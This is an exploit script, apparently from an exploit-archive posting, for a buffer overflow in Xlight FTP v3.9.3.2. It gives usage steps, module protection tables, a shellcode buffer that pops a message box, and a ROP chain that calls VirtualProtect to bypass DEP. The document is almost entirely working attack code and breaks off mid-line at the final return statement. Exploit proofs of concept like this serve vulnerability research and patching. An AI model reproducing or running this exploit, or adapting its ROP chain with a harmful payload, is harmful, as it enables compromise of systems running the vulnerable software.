# Exploit Title: Xlight FTP v3.9.3.2 - Buffer Overflow (SEH Egghunter + ROP) # Exploit Author: Hejap Zairy # Date: 13.07.2022 # Software Link: http://www.xlightftpd.com/download/setup.exe # Tested Version: v3.9.3.2(2022-1-5) # Tested on: Windows 10 64bit # 1.- Run python code : 0day-Hejap_Zairy.py # 2.- Open 0day_Hejap.txt and copy All content to Clipboard # 3.- Open Audio Conversion Wizard and press Enter Code # 5.- Click 'Server ip ' -> 'General' -> 'Advanced' -> 'Excute a program after user logged in ' -> 'Setup' # 6.- Crashed # Author Code By Hejap Zairy #!/usr/bin/env python # Auther Hejap Zairy #!/usr/bin/env python import struct ##================================================================================ ## 2022-03-12 16:54:06 ##================================================================================ ##----------------------------------------------------------------------------------------------------------------------------------------- ## Module info : ##----------------------------------------------------------------------------------------------------------------------------------------- ## Base | Top | Size | Rebase | SafeSEH | ASLR | NXCompat | OS Dll | Version, Modulename & Path ##----------------------------------------------------------------------------------------------------------------------------------------- ## 0x76aa0000 | 0x76ae4000 | 0x00044000 | True | True | True | False | True | 10.0.17763.1 [SHLWAPI.dll] (C:\Windows\System32\SHLWAPI.dll) ## 0x76970000 | 0x76a93000 | 0x00123000 | True | True | True | False | True | 10.0.17763.1490 [ucrtbase.dll] (C:\Windows\System32\ucrtbase.dll) ## 0x766a0000 | 0x766bc000 | 0x0001c000 | True | True | True | False | True | 10.0.17763.1075 [profapi.dll] (C:\Windows\System32\profapi.dll) ## 0x76340000 | 0x763c0000 | 0x00080000 | True | True | True | False | True | 10.0.17763.1 [msvcp_win.dll] (C:\Windows\System32\msvcp_win.dll) ## 0x75680000 | 0x757ea000 | 0x0016a000 | True | True | True | False | True | 10.0.17763.1879 [gdi32full.dll] (C:\Windows\System32\gdi32full.dll) ## 0x75a60000 | 0x75bfe000 | 0x0019e000 | True | True | True | False | True | 10.0.17763.1 [CRYPT32.dll] (C:\Windows\System32\CRYPT32.dll) ## 0x74ff0000 | 0x74fff000 | 0x0000f000 | True | True | True | False | True | 10.0.17763.1 [kernel.appcore.dll] (C:\Windows\System32\kernel.appcore.dll) ## 0x00400000 | 0x006d5000 | 0x002d5000 | False | False | False | False | False | 3.9.3.2 [xlight.exe] (C:\Users\Tarnished\Desktop\Xlight\xlight.exe) ## 0x74870000 | 0x74909000 | 0x00099000 | True | True | True | False | True | 10.0.17763.1075 [ODBC32.dll] (C:\Windows\SYSTEM32\ODBC32.dll) ## 0x74b20000 | 0x74bbc000 | 0x0009c000 | True | True | True | False | True | 10.0.17763.1 [apphelp.dll] (C:\Windows\SYSTEM32\apphelp.dll) ## 0x76280000 | 0x76297000 | 0x00017000 | True | True | True | False | True | 10.0.17763.1 [win32u.dll] (C:\Windows\System32\win32u.dll) ## 0x75c50000 | 0x761a6000 | 0x00556000 | True | True | True | False | True | 10.0.17763.1911 [SHELL32.dll] (C:\Windows\System32\SHELL32.dll) ##0x006d4270 : kernel32.loadlibrarya | 0x76ce2280 | startnull,asciiprint,ascii,alphanum {PAGE_READWRITE} [xlight.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v3.9.3.2 (C:\Users\Tarnished\Desktop\Xlight\xlight.exe) ##0x006d4258 : comdlg32.getopenfilenamea | 0x77226240 | startnull,asciiprint,ascii,alphanum {PAGE_READWRITE} [xlight.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v3.9.3.2 (C:\Users\Tarnished\Desktop\Xlight\xlight.exe) ##0x006d427c : kernel32.virtualprotect | 0x76ce0c10 | startnull,asciiprint,ascii {PAGE_READWRITE} [xlight.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v3.9.3.2 (C:\Users\Tarnished\Desktop\Xlight\xlight.exe) ##0x006d4278 : kernel32.getprocaddress | 0x76ce05a0 | startnull,asciiprint,ascii,alphanum {PAGE_READWRITE} [xlight.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v3.9.3.2 (C:\Users\Tarnished\Desktop\Xlight\xlight.exe) # RopFunc syscall null badchars = [0x00,0x0a,0x0d,0x3a,0xff] buf = b"" buf += b"\xd9\xeb\x9b\xd9\x74\x24\xf4\x31\xd2\xb2\x77\x31\xc9" buf += b"\x64\x8b\x71\x30\x8b\x76\x0c\x8b\x76\x1c\x8b\x46\x08" buf += b"\x8b\x7e\x20\x8b\x36\x38\x4f\x18\x75\xf3\x59\x01\xd1" buf += b"\xff\xe1\x60\x8b\x6c\x24\x24\x8b\x45\x3c\x8b\x54\x28" buf += b"\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x34" buf += b"\x49\x8b\x34\x8b\x01\xee\x31\xff\x31\xc0\xfc\xac\x84" buf += b"\xc0\x74\x07\xc1\xcf\x0d\x01\xc7\xeb\xf4\x3b\x7c\x24" buf += b"\x28\x75\xe1\x8b\x5a\x24\x01\xeb\x66\x8b\x0c\x4b\x8b" buf += b"\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8\x89\x44\x24\x1c" buf += b"\x61\xc3\xb2\x08\x29\xd4\x89\xe5\x89\xc2\x68\x8e\x4e" buf += b"\x0e\xec\x52\xe8\x9f\xff\xff\xff\x89\x45\x04\xbb\xef" buf += b"\xce\xe0\x60\x87\x1c\x24\x52\xe8\x8e\xff\xff\xff\x89" buf += b"\x45\x08\x68\x6c\x6c\x20\x41\x68\x33\x32\x2e\x64\x68" buf += b"\x75\x73\x65\x72\x30\xdb\x88\x5c\x24\x0a\x89\xe6\x56" buf += b"\xff\x55\x04\x89\xc2\x50\xbb\xa8\xa2\x4d\xbc\x87\x1c" buf += b"\x24\x52\xe8\x5f\xff\xff\xff\x68\x6f\x78\x58\x20\x68" buf += b"\x61\x67\x65\x42\x68\x4d\x65\x73\x73\x31\xdb\x88\x5c" buf += b"\x24\x0a\x89\xe3\x68\x58\x20\x20\x20\x68\x61\x69\x72" buf += b"\x79\x68\x61\x70\x20\x5a\x68\x20\x48\x65\x6a\x68\x30" buf += b"\x64\x61\x79\x31\xc9\x88\x4c\x24\x10\x89\xe1\x31\xd2" buf += b"\x52\x53\x51\x52\xff\xd0\x31\xc0\x50\xff\x55\x08" def Hejap_rop_chain(): Hejap_gadgets = [ 0x75c4f468, # POP EBX # RETN [windows.storage.dll] ** REBASED ** ASLR 0x7731c2a0, # ptr to &VirtualProtect() [IAT CRYPT32.dll] ** REBASED ** ASLR 0x75deb176, # MOV ESI,DWORD PTR DS:[EBX] # RETN [windows.storage.dll] ** REBASED ** ASLR #[---INFO:gadgets_to_set_ebp:---] 0x7545eebb, # POP EBP # RETN [SHLWAPI.dll] ** REBASED ** ASLR 0x75ff2bdb, # & call esp [msvcp_win.dll] ** REBASED ** ASLR #[---INFO:gadgets_to_set_ebx:---] 0x755d53b2, # POP EAX # RETN [KERNELBASE.dll] ** REBASED ** ASLR 0xfffffdff, # Value to negate, will become 0x00000201 0x74d241d7, # NEG EAX # RETN [USER32.dll] ** REBASED ** ASLR 0x75e72ff1, # XCHG EAX,EBX # RETN [windows.storage.dll] ** REBASED ** ASLR #[---INFO:gadgets_to_set_edx:---] 0x765a2dad, # POP EAX # RETN [bcryptPrimitives.dll] ** REBASED ** ASLR 0xffffffc0, # Value to negate, will become 0x00000040 0x75297b65, # NEG EAX # RETN [gdi32full.dll] ** REBASED ** ASLR 0x76a3b05a, # XCHG EAX,EDX # RETN [SHELL32.dll] ** REBASED ** ASLR #[---INFO:gadgets_to_set_ecx:---] 0x72bb29ef, # POP ECX # RETN [UXTHEME.DLL] ** REBASED ** ASLR 0x7774f16b, # &Writable location [ntdll.dll] ** REBASED ** ASLR #[---INFO:gadgets_to_set_edi:---] 0x77275d3d, # POP EDI # RETN [CRYPT32.dll] ** REBASED ** ASLR 0x75849686, # RETN (ROP NOP) [KERNEL32.DLL] ** REBASED ** ASLR #[---INFO:gadgets_to_set_eax:---] 0x72bf2465, # POP EAX # RETN [UXTHEME.DLL] ** REBASED ** ASLR 0x90909090, # nop #[---INFO:pushad:---] 0x76a37959, # PUSHAD # RETN [SHELL32.dll] ** REBASED ** ASLR ] return ''.join(struct.pack('